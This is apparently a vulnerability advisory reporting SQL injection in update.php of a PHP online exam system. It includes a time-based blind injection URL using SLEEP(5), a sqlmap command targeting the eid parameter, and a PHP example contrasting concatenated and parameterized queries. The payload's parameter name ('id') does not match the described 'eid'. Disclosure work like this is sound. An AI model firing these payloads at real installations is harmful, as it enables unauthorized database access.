# code-projects online-exam-mastering-system-php has SQL injection in update.php

## supplier

https://code-projects.org/online-exam-mastering-system-php/

## describe

In update.php,

### Code analysis

![image](https://hackmd.io/_uploads/SJy39x7Bkl.png)

The SQL injection vulnerability here exists because the value of `$_GET['eid']` is directly embedded into the SQL queries without any validation or sanitization. If an attacker inputs malicious SQL code as the `eid` parameter, it will be executed by the database. For example, if `eid` is set to `'1' OR '1'='1'`, it could manipulate the query to return or modify unintended data. Always use **prepared statements** or **parameterized queries** to prevent this.

## payload

```
http://host/update.php?q=quiz&step=2&id=5589741f9ed52' AND (SELECT 1435 FROM (SELECT(SLEEP(5)))LDIH) AND 'IBid'-'IBid&n=1&t=5&qid=5589751a63091
```

## exploit

Use sqlmap to attack:

```
sqlmap -u "http://host/update.php?q=quiz&step=2&eid=5589741f9ed52&n=1&t=5&qid=5589751a63091" -p eid --batch
```

![image](https://hackmd.io/_uploads/rk2IsJXSkx.png)
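The fix recommended in the code analysis, shown as an added example that is not the project's own code: the concatenated query pattern next to a version that validates `eid` and binds it as a parameter. Assumptions: an in-memory SQLite database via PDO stands in for the project's database so the script runs offline, and the table and column names (`quiz`, `eid`, `title`) and both function names are hypothetical.

```php
<?php
declare(strict_types=1);

// Constructed stand-in for the project's database (assumption): in-memory SQLite.
// Table and column names are hypothetical; the rows are constructed sample data.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE quiz (eid TEXT PRIMARY KEY, title TEXT)");
$db->exec("INSERT INTO quiz VALUES ('5589741f9ed52', 'Quiz A'), ('aaaaaaaaaaaaa', 'Quiz B')");

// Vulnerable pattern described in the analysis: the request value becomes SQL text.
function find_quiz_unsafe(PDO $db, string $eid): array
{
    $sql = "SELECT title FROM quiz WHERE eid = '$eid'";
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Hardened: allow-list the identifier format, then bind it as a parameter.
function find_quiz_safe(PDO $db, string $eid): array
{
    // The eid values shown on the page are 13 lowercase hex characters.
    if (preg_match('/\A[0-9a-f]{13}\z/', $eid) !== 1) {
        throw new InvalidArgumentException('eid has an unexpected format');
    }
    $stmt = $db->prepare('SELECT title FROM quiz WHERE eid = :eid');
    $stmt->execute([':eid' => $eid]);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Constructed input in the style of the page's `'1' OR '1'='1'` example.
$tampered = "x' OR '1'='1";

// Unsafe: the quote closes the string literal and the OR clause joins the query.
echo 'unsafe rows: ', count(find_quiz_unsafe($db, $tampered)), PHP_EOL;

// Safe: the tampered value fails validation before any SQL is prepared.
try {
    find_quiz_safe($db, $tampered);
} catch (InvalidArgumentException $e) {
    echo 'safe: rejected (', $e->getMessage(), ')', PHP_EOL;
}

// Binding alone, without the format check, still treats the value as data only.
$stmt = $db->prepare('SELECT title FROM quiz WHERE eid = ?');
$stmt->execute([$tampered]);
echo 'bound rows: ', count($stmt->fetchAll(PDO::FETCH_COLUMN)), PHP_EOL;

// A well-formed eid goes through the hardened path normally.
echo 'valid eid: ', implode(', ', find_quiz_safe($db, '5589741f9ed52')), PHP_EOL;
```

In the real application the same change applies to every query in `update.php` that takes `eid` from `$_GET`; with `mysqli` the equivalent calls are `prepare()`, `bind_param()` and `execute()`.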